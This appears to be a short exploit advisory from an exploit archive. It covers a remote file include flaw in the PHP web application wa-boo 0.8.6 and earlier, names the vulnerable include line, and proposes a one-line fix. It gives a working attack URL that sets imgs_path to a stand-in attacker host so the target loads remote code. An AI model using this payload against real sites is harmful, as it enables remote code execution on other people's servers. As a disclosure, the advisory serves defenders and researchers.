Exploit for php platform in category web applications
===================================================
wa-boo <= 0.8.6 - Remote File Include Vulnerability
===================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
wa-boo <= 0.8.6 - Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
o \ o / _ o __| \ / |__ o _ \ o / o
/|\ | /\ __\o \o | o/ o/__ /\ | /|\
/ \ / \ | \ /) | ( \ /o\ / ) | (\ / | / \ / \
Discovered by: Febr?o - febronio[at]linuxmail.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Code /includes/fotools.php:
include($imgs_path . "includes/css.php" );
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$imgs_path is not properly sanitized before being used.
Solution:
Add this line to your php-file:
$imgs_path ="bla/bla" //Your root path
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://target/[script_path]/includes/fotools.php?imgs_path=http://evil_script?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx for: BLaCK KaME RaIDER
_-~~\
/(_|_-~
/ /~==[]\ ____-------_ ______________
/ (_ //(\0)~~~~ Kawasaki ~\ /' ___/ ~~~~/
(| ~~--__ | ___/_____---~~~ ZX12r \
\. ___ ~~--__ ____ /----~~~~ _/ __--~~'
~\ \\\\ ~~-_ ~-_____/____----~~ __--~~___
_ ----/ \ \\\\ ~-_ ~-_ __--~~----~~_ ]=
_-~ ___ / /__\ ~~~ ~-_ ~~~~~~~~/~~~ _-~ ~-_
/-~~~_-|/ / ~\ _) ~\ /~~~~~---__-----_ \
; / \/_//`\ \ __--~~/_ `\_____/~~~~~~~~~~~~~--_/\ .
| | \((*))/ | |\ __--~~ /o \ |-----------_____( 0)_) | |
| \ |~| / | )-~~ \ 0 ) \O~~~~~~/~--------|~| / ,
\ ~-----~ / / ~~~~~~~~~~~/_/' \ ~-----~ /
~-_ _-~ `---------------------------' `-_ _-~
~ ----- ~ ~ ----- ~
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# 0day.today [2018-01-06] #